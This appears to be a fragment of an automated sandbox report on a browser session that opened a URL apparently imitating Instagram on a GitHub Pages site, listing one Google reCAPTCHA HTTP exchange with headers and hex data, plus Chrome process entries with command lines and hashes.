                                                                                                                                                                                                                                  149192.168.2.650087216.58.206.684431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:57 UTC671OUTGET /recaptcha/api2/webworker.js?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY HTTP/1.1
                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
                                                                                                                                                                                                                                  2024-09-29 04:53:57 UTC917INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                  Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                  Expires: Sun, 29 Sep 2024 04:53:57 GMT
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:57 GMT
                                                                                                                                                                                                                                  Cache-Control: private, max-age=300
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  2024-09-29 04:53:57 UTC108INData Raw: 36 36 0d 0a 69 6d 70 6f 72 74 53 63 72 69 70 74 73 28 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 78 64 73 30 72 7a 47 72 6b 74 52 38 38 75 45 5a 32 4a 55 76 64 67 4f 59 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 29 3b 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 66importScripts('https://www.gstatic.com/recaptcha/releases/xds0rzGrktR88uEZ2JUvdgOY/recaptcha__en.js');
                                                                                                                                                                                                                                  2024-09-29 04:53:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                  Start time:00:52:53
                                                                                                                                                                                                                                  Start date:29/09/2024
                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                  Start time:00:52:58
                                                                                                                                                                                                                                  Start date:29/09/2024
                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2028,i,1631408217040939305,6486719346093369341,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                  Start time:00:53:00
                                                                                                                                                                                                                                  Start date:29/09/2024
                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sayidanur.github.io/instagram.com/"
                                                                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                  Start time:00:53:43
                                                                                                                                                                                                                                  Start date:29/09/2024
                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4048 --field-trial-handle=2028,i,1631408217040939305,6486719346093369341,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  No disassembly